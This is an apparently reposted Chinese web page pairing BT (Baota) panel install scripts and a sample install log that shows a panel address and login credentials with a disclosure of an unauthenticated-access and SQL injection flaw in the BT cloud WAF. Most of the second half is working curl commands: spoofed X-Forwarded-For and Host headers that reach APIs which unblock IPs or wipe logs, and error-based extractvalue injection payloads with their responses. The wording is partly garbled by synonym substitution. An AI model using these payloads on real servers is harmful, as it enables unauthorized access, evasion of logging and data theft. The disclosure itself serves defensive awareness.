phpssophp注入破绽技巧_浮屠WAF防火墙未授权访问马脚SQL 注入马脚已修复

宝塔面板最新版安装

Linux面板8.0.5安装脚本

Centos安装脚本

yum install -y wget && wget -O install.sh https://download.bt.cn/install/install_6.0.sh && sh install.sh ed8484bec

Ubuntu/Deepin安装脚本

wget -O install.sh https://download.bt.cn/install/install-ubuntu_6.0.sh && sudo bash install.sh ed8484bec

Debian安装脚本

wget -O install.sh https://download.bt.cn/install/install-ubuntu_6.0.sh && bash install.sh ed8484bec

万能安装脚本

if [ -f /usr/bin/curl ];then curl -sSO https://download.bt.cn/install/install_panel.sh;else wget -O install_panel.sh https://download.bt.cn/install/install_panel.sh;fi;bash install_panel.sh ed8484bec

国产龙芯架构安装脚本

wget -O install_panel.sh https://download.bt.cn/install/0/loongarch64/loongarch64_install_panel.sh && bash install_panel.sh ed8484bec

把稳：必须为没装过其它环境如Apache/Nginx/php/MySQL的新系统,推举利用centos 7.X的系统安装宝塔面板

推举利用Chrome、火狐、edge浏览器，国产浏览器请利用极速模式访问面板登录地址

如果不愿定利用哪个Linux系统版本的，可以利用万能安装脚本

国产龙芯架构CPU安装命令，支持龙芯架构的loongnix 8.x、统信UOS 20、kylin v10系统

云WAF安装脚本

单机版脚本

URL=https://download.bt.cn/cloudwaf/scripts/install_cloudwaf.sh && if [ -f /usr/bin/curl ];then curl -sSO "$URL" ;else wget -O install_cloudwaf.sh "$URL";fi;bash install_cloudwaf.sh

集群版脚本

URL=https://download.bt.cn/cloudwaf/scripts/install_waf_master.sh && if [ -f /usr/bin/curl ];then curl -sSO "$URL" ;else wget -O install_waf_master.sh "$URL";fi;bash install_waf_master.sh

把稳：已经安装了宝塔面板的机器，不用再安装云WAF，在宝塔面板上安装利用Nginx防火墙即可。

堡塔云WAF须要一台独立做事器安装支配。

安装完成后推举利用Chrome、火狐、edge浏览器，国产浏览器（极速模式）访问登录系统

清理面板所有host检测节点(0.5s)：download.bt.cn当前可用下载节点：download.bt.cn 检测www节点(0.5S)：{'name': '主节点', 'url': 'www-node1.bt.cn'}检测api节点(0.5S)：{'name': '主节点', 'url': 'api-node1.bt.cn'}Stopping Bt-Tasks... doneStopping Bt-Panel... doneStarting Bt-Panel.... doneStarting Bt-Tasks... doneLoaded plugins: fastestmirrorLoading mirror speeds from cached hostfilePackage firewalld-0.6.3-13.el7_9.noarch already installed and latest versionNothing to doCreated symlink from /etc/systemd/system/dbus-org.fedoraproject.FirewallD1.service to /usr/lib/systemd/system/firewalld.service.Created symlink from /etc/systemd/system/multi-user.target.wants/firewalld.service to /usr/lib/systemd/system/firewalld.service.success==================================================================Congratulations! Installed successfully!========================面板账户登录信息========================== 外网面板地址: https://8.141.89.22:35952/4c2265a0 内网面板地址: https://172.17.225.236:35952/4c2265a0 username: yusci8xm password: 7553f5d7 =========================打开面板前请看=========================== 【云做事器】请在安全组放行 35952 端口 因默认启用自签证书https加密访问，浏览器将提示不屈安 点击【高等】-【连续访问】或【接管风险并连续】访问 教程：https://www.bt.cn/bbs/thread-117246-1-1.html==================================================================

未授权访问漏洞

2024年2月17日15:13发布更新：宝塔回应称该漏洞去年就已经修复，同时该漏洞仅可以查询数据、无法造成其他威胁。
其余宝塔WAF防火墙与宝塔面板是两个产品，存在漏洞的产品是WAF防火墙，不是宝塔面板。

据 V2EX 网友发布的帖子，在春节期间他在研究宝塔面板的漏洞时，创造宝塔面板附带的 WAF 防火墙 (宝塔 Nginx 防火墙) 存在 SQL 注入漏洞。

宝塔面板的 WAF 本身是一款收费产品，购买并开通后可以用来拦截 CC 攻击或者 SQL 注入之类的，但没想到这个模块本身也存在 SQL 注入漏洞。

漏洞位于 /cloud_waf/nginx/conf.d/waf/public/waf_route.lua 中，布局知足特定条件的 IP 地址和域名的情形下，不须要进行任何验证即可访问宝塔面板 API。

而且还可以他通过将 x-forwarded-for header 设置为 127.0.0.1、域名设置为 127.0.0.251 来知足上面哀求的条件。

配置 x-forwarded-for 头为 127.0.0.1 即可知足 ip 是 127.0.0.1 的条件

配置 host 头为 127.0.0.251 即可知足域名是 127.0.0.251 的条件

供应一条 curl 参数供大家参考

curl 'http://宝塔地址/API' -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'

get_btwaf_drop_ip

这个 API 用来获取已经拉黑的 IP 列表，利用以下命令发起访问

curl 'http://btwaf-demo.bt.cn/get_btwaf_drop_ip' -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'

remove_btwaf_drop_ip

这个 API 用来解封 IP ，供应一个 get 参数即可，利用以下命令发起访问

curl 'http://btwaf-demo.bt.cn/remove_btwaf_drop_ip?ip=1.2.3.4' -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'

clean_btwaf_drop_ip

这个 API 用来解封所有 IP ，利用以下命令发起访问

curl 'http://btwaf-demo.bt.cn/clean_btwaf_drop_ip' -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'

updateinfo

这个 API 看起来是更新配置用的，须要一个 types 参数做校验，但实际并没有什么用途，利用以下命令发起访问

curl 'http://btwaf-demo.bt.cn/updateinfo?types' -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'

get_site_status

这个 API 用来获取网站的配置，server_name 参数须要供应网站的域名，利用以下命令发起访问

curl 'http://btwaf-demo.bt.cn/get_site_status?server_name=bt.cn' -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'

clean_btwaf_logs

这个 API 用来删除宝塔的所有日志，利用以下命令发起访问

curl "http://btwaf-demo.bt.cn/clean_btwaf_logs" -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'

后续还有一些 API 大同小异，不一一列举了

get_global_status

clear_speed_hit

clear_replace_hit

reset_customize_cc

clear_speed_countsize

代码位于 /cloud_waf/nginx/conf.d/waf/public/waf_route.lua 文件中，源文件是 luajit 编译后的内容，反编译一下即可看到源码

代码逻辑就在 get_site_status API 中，slot1 变量便是 server_name 参数。
事理很大略，server_name 参数没有做任何校验就直接带入了 SQL 查询。

宝塔官网目前已经修复这个问题，拿之前的测试记录为例，试试以下命令：

curl "http://btwaf-demo.bt.cn/get_site_status?server_name='-extractvalue(1,concat(0x5c,database()))-'" -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'

相应如下

{"status":false,"msg":"数据查询失落败: XPATH syntax error: '\\btwaf': 1105: HY000."}

从相应来看已经注入成功，通过 updatexml 的报错成功的爆出了库名叫 btwaf

连续实行以下命令：

curl "http://btwaf-demo.bt.cn/get_site_status?server_name='-extractvalue(1,concat(0x5c,version()))-'" -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'

相应如下

{"status":false,"msg":"数据查询失落败: XPATH syntax error: '\\8.1.0': 1105: HY000."}

从相应来看，mySQL 版本是 8.1.0

在连续实行以下命令

curl "http://btwaf-demo.bt.cn/get_site_status?server_name='-extractvalue(1,concat(0x5c,(select'hello,world')))-'" -H 'X-Forwarded-For: 127.0.0.1' -H 'Host: 127.0.0.251'

相应如下

{"status":false,"msg":"数据查询失落败: XPATH syntax error: '\\hello,world': 1105: HY000."}

看起来 select ‘hello,world’ 也实行成功了，到此为止，基本可以实行任意命令。

本文来源于利刃信安